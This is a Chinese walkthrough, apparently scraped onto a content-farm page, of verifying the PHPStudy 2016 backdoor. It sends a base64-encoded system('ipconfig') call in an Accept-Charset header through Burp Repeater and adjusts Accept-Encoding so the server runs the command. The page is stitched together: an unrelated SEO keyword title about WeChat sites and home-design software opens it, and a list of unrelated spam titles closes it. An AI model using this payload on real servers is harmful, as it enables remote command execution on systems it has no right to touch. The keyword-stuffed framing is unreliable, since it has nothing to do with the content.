当前位置: 首页 > news >正文

制作公众号网站开发家装设计软件自学

制作公众号网站开发,家装设计软件自学,做现货黄金网站,wordpress 识别pc手机文章目录 漏洞描述漏洞验证 漏洞描述 PHPStudyRCE(Remote Code Execution),也称为phpstudy_backdoor漏洞,是指PHPStudy软件中存在的一个远程代码执行漏洞。 漏洞验证 打开phpstudy2016,用bp自带的浏览器访问www目录下…

文章目录

  • 漏洞描述
  • 漏洞验证

漏洞描述

PHPStudyRCE(Remote Code Execution),也称为phpstudy_backdoor漏洞,是指PHPStudy软件中存在的一个远程代码执行漏洞。

漏洞验证

打开phpstudy2016,用bp自带的浏览器访问www目录下的phpinfo.php文件,访问后结果如下:
在这里插入图片描述

然后在bp中将抓到的数据包发送到repeater模块:

在这里插入图片描述

将system(‘ipconfig’);命令做base64编码:

system('ipconfig');

编码后

c3lzdGVtKCdpcGNvbmZpZycpOw==

在这里插入图片描述

然后在repeater模块添加Accept-Charset: 字段,将base64编码放入:

Accept-Charset:c3lzdGVtKCdpcGNvbmZpZycpOw==

注意Accept-Encoding字段中gzip和deflate之间不能有空格!

在这里插入图片描述

去掉空格后点击send发送,ipconfig命令被执行:

在这里插入图片描述

http://www.yayakq.cn/news/152353/

相关文章:

  • 国外的服务器建设的网站做抢单软件的网站
  • 南通网站搭建定制海门城乡建设管理局网站
  • 互联网运营培训舆情优化公司
  • 网站如何在百度运城市做网站价格
  • 自动全屏网站模板做网站前提需要什么
  • 建设网站那个公司好网站建设工程师职责说明
  • 电子商务网站开发的任务书建设银行信用卡在网站激活后如何设置密码
  • 做二手机网站企业微信怎么下载
  • 网站推广做什么福田做网站需要多少钱
  • 一 通过网站推广品牌国际新闻界
  • 具体的网站建设方案漳州做网站建设公司
  • 网页设计素材网站推荐域名解析管理网站
  • 淘宝客网站开发服务商wordpress get_comment
  • 网站推广策划案seo教程wordpress 数据库名贵
  • 做书评的网站有哪些内容营销是一种什么模式
  • 做淘宝网站怎么弄的字体logo在线生成器
  • 上线倒计时单页网站模板免费网站怎么建立
  • 山东咕果做网站怎么样网站建设需要多少
  • 排名好的手机网站建设漯河专业做网站的公司
  • 奉贤专业做网站中国知名网站排名
  • 怎么为做的网站配置域名安卓蓝牙app开发教程
  • 赤峰公司网站建设网站建设天津
  • 农业农村部农田建设管理司网站灯具公司网站模板
  • 商业设计网站著名网站用什么语言做后台
  • 大网站怎样选域名晨星wordpress
  • 宁波企业如何建网站月入百万的游戏代理
  • 朔州网站建设电话免费logo图片生成器 自动生成
  • 网站可以叫做系统吗腾讯广告平台
  • 向搜索引擎提交网站沈阳网站建设德泰诺
  • 东莞网站建设渠道郑州seo技术博客